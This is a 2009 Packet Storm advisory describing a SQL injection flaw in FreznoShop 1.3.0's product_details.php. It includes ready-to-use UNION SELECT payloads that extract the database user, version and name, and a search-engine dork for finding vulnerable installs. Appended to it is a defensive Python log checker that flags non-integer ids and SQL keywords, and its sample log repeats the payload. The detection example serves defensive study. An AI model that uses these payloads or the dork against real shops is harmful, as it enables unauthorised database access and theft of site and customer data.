FreznoShop 1.3.0 SQL Injection

2009-04-14T00:00:00
ID PACKETSTORM:76603
Type packetstorm
Reporter NoGe
Modified 2009-04-14T00:00:00

Description

======================================================================================  
  
  
[o] FreznoShop 1.3.0 SQL Injection Vulnerability  
  
Software : FreznoShop version 1.3.0  
Vendor : http://sourceforge.net/projects/freznoshop/  
Download : http://sourceforge.net/project/platformdownload.php?group_id=86090  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
======================================================================================  
  
  
[o] Vulnerable file  
  
product_details.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/product_details.php?id=[SQL]  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11--  
product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12--  
  
  
  
[o] Dork  
  
"Powered by FreznoShop"  
  
  
======================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3  
H312Y yooogy mousekill }^-^{ loqsa  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
======================================================================================  
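
Added example (not part of the original advisory or of the FreznoShop code): a web-server log check for the request pattern shown under Exploit. It generalizes from the UNION SELECT strings above to any non-integer id sent to product_details.php; the combined log format, the /shop/ path, the integer-only id rule and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Client IP and request target from an Apache/nginx "combined" log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Words used only to label a hit for triage; the integer allow-list does the detecting.
SQL_WORDS = re.compile(r"\b(union|select|user|version|database)\b", re.I)

# Constructed sample log lines (documentation IP ranges, hypothetical /shop/ install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2009:10:01:02 +0000] "GET /shop/product_details.php?id=22 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Apr/2009:10:03:41 +0000] "GET /shop/product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11-- HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Apr/2009:10:04:00 +0000] "GET /shop/index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Apr/2009:10:05:13 +0000] "GET /shop/product_details.php?id=22%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
]

def check_id(value):
    """Return the reasons a decoded id value is suspicious (empty list means clean)."""
    reasons = []
    if not re.fullmatch(r"\d{1,10}", value):  # assumption: a product id is a plain integer
        reasons.append("non-integer id")
    words = sorted({w.lower() for w in SQL_WORDS.findall(value)})
    if words:
        reasons.append("sql words: " + ",".join(words))
    return reasons

def flag_requests(log_lines):
    """Return (client_ip, decoded_id, reasons) for each suspicious product_details.php hit."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/product_details.php"):
            continue
        # parse_qs percent-decodes, so %20, + and a literal space all compare equal.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reasons = check_id(value)
            if reasons:
                findings.append((m.group("ip"), value, reasons))
    return findings

if __name__ == "__main__":
    for ip, value, reasons in flag_requests(SAMPLE_LOG):
        print(ip, repr(value), "; ".join(reasons))
```

The same integer-only rule, enforced in product_details.php before the value reaches the query, is the server-side counterpart of this check.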